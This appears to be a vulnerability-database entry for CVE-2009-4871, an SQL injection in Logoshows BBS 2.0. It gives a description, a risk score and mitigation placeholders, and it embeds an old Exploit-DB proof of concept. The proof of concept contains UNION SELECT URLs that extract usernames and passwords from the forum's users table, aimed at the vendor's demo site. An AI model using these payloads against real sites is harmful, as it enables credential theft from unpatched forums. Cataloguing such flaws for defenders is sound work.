CVE-2009-4871
high
CVSS v3
—
CVSS v4 NEW
—
VIR risk
8.5
Description
SQL injection vulnerability in globepersonnel_forum.asp in Logoshows BBS 2.0 allows remote attackers to execute arbitrary SQL commands via the forumid parameter.
Predictions
Exploit likelihood
20%
Patch ETA
—
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Logoshows BBS 2.0 - 'forumid' SQL Injection
__________________________________________________________________________________________________________________________
# Author : Ruzgarin_Oglu
# Script Name : Logoshows BBS v2.0
# Script Download : http://www.logoshows.com/download/bbs88.rar
# Vulnerable Type : Sql Injection
# Demo : http://www.logoshows.com/bbs/
# Licence And Pricing : $1.00 USD
# Special Thanks : By.Ultr@si(Student lol),Fortyseven,Rawage,Daniel-Koo,Subz3rr0,By.Seyfi,Fero,Septemb0x, ve ismini sayamadığım diğer dostlarım...
___________________________________________________________________________________________________________________________________
Exploit:
/globepersonnel_forum.asp?forumid=[SQL]
POC:
http://www.victim.com/[path]/globepersonnel_forum.asp?forumid=[SQL]
Example
Username:
http://www.logoshows.com/bbs/globepersonnel_forum.asp?forumid=1+union+select+0,1,2,3,4,5,6,7,8,9,10,username,12,13,14,15,16,17,18,19+from+users
Password:
http://www.logoshows.com/bbs/globepersonnel_forum.asp?forumid=1+union+select+0,1,2,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19+from+users
----Note----
Herkesin bir s*k*lme zamanı vardır...
Bekleyin beni!
----Note----
# milw0rm.com [2009-08-07]
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| logoshows | logoshows_bbs | 2.0 | |
References
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.